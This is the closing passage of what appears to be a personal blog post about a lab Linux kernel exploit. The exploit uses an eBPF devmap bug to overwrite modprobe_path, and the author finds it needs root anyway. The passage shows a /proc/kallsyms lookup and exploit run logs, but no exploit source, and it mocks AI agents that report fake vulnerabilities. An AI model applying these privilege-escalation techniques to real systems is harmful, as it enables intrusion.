Initially I wanted to explore a cool modprobe_path technique I was shown through this article. It turns out that the classic strategy of making a garbage executable file with junk header bytes doesn't work to trigger modprobe_path execution. However, this post already took like two weeks to write, and laziness overcame me. I figured that demonstrating a modprobe path overwrite was good enough.

The final trick is to make sure that it works with kASLR. The way I wrote it, it certainly should have, but kASLR always fucks things up. I quickly changed nokaslr to kaslr in my qemu script and ran it, and to my surprise, it worked immediately! Wow! I'm a brilliant exploit developer.

That is, until I thought about it for maybe 3 more seconds, saw that my vmlinux symbols were still mapping properly to actual functions, and realised... ah... I'm chopped... CONFIG_RELOCATABLE=y, CONFIG_RANDOMIZE_BASE=y. Meaning, kASLR is also a kernel configuration. Glup...


/ # cat /proc/kallsyms | grep modprobe
ffffffff91e7cc70 t free_modprobe_argv
ffffffff926ae3c0 D modprobe_path
/ # ./exploit
hello vro
[!] initialising...
[!] wrote trampoline
[+] devmap fd=3
[+] prog fd=4
[!] creating macvlans
[+] link_fd=5
[+] sleeping for 3 seconds to wait for modprobe overwrite
BUG: scheduling while atomic: kworker/0:1/8/0x00000101
[!] modprobe path > /tmp/a

But hey, once I got that sorted, it did work (after some light debugging)! For real, for real this time. Now that kASLR was out of the way, the final step was to test it on a non-root user.

Komm, süsser Tod

This is my last kernel config ragebait of the day, I promise. When I tried running whoami, it seemed that the utility was unsupported. I learned that this is because having multiple users, in and of itself, is its own config. (By default, with CONFIG_MULTIUSER not enabled, only the root user exists). That one was especially embarrassing to learn, but this project was already really embarrassing anyway.

So, I recompiled my darling Linux kernel for the last ever time, and fired off my exploit.


/ $ ./exploit
hello vro
[!] initialising...
[!] wrote trampoline
[+] devmap fd=-1
BPF_PROG_LOAD failed: Operation not permitted

[+] sleeping for 3 seconds to wait for modprobe overwrite
[!] modprobe path > /sbin/modprobe
      

Ah... hah? What? Maybe it's like a, consistency thing? Haha? Did I miss another kernel config?

It was at this juncture that I realized that creating eBPF programs and loading them is already a privileged action. You would only be capable of exploiting this bug to get root if you were already root.

I would like to emphasise that I realised this when the project was already fully complete, which took around 4 days of work on-and-off. Reader, I am not ragebaiting this time, I genuinely had a fully working exploit before it occurred to me that - hmm, eBPF programs are already really powerful, surely there must be some permission restriction on them. They make rootkits with these for fuck's sake! I genuinely remember reading through this thesis on an eBPF rootkit where they talk about the privileges at hand, and somehow this entire thing just slipped my mind.

To be clear, I had no false pretenses about the validity of this exploit actually working on any system up til now - I knew this was bullshit the instant I had to disable stack cookies. No kernel on earth is shipping both with eBPF support and no stack cookies! Not a single fucking one! But this was a beautiful bow to tie on top of it all. It's almost comedic how utterly useless this is, and how much time I still spent on it despite that.

So, uh. Pwn, huh? What did we learn?

  1. I really might be very stupid,
  2. In terms of pwn, basically nothing, because the exploit was super simple,
  3. Everything is a Linux configuration,
  4. I'm chopped, gay, and emo.

Great! To be honest, it seems like 2026 is the year of these bullshit exploits. Agents seem to really like cheating and finding "vulnerabilities" where they really bury the lede about how it work if ASLR were disabled. Like, no shit, buddy! Everything would work if ASLR was disabled, and everything would work if you had an LFI leak on /proc/self/maps! I think my favorite instance of this was a DEFCON challenge wherein an AI hallucinated that musl base and PIE base were a constant offset from one another because gdb specifically standardises those offsets during debugging. In any case, I'm happy to join the hallowed company of all those fake nginx "RCE"s. This is what real research looks like in the big '26.

Concluding

Writing this post I was a bit conflicted - I had fun, and I think it's a cool project, but also, like, it's very technically uninteresting and lame. We didn't even talk about kmalloc()! There's a whole world in the kernel here! They got some shit called SLAB and some other shit called SLUB! What the hell?

I think if you know anything about kernel pwn, you will come away from this having learned nothing. Then, I think if you know nothing about kernel pwn, you will also have come away from this learning nothing. I was really wondering who my audience was for this (there is none) so I figured - not all posts need to be educational, maybe someone will find a bit of joy at my expense.

I was going to open-source my work here, but I'm super lazy. I guess if you ever want to fuck around with these files or anything, let me know and I will throw these your way. I don't really see the point in putting this up on Github or anything, and also, it's very embarrassing.

But, you know, I had a good time. I think it's always good practice to stop fucking around and playing with toys and try to do some real shit for once, and get acquainted with the wonderful Real World. I encourage it!

Reward for reaching the end of this post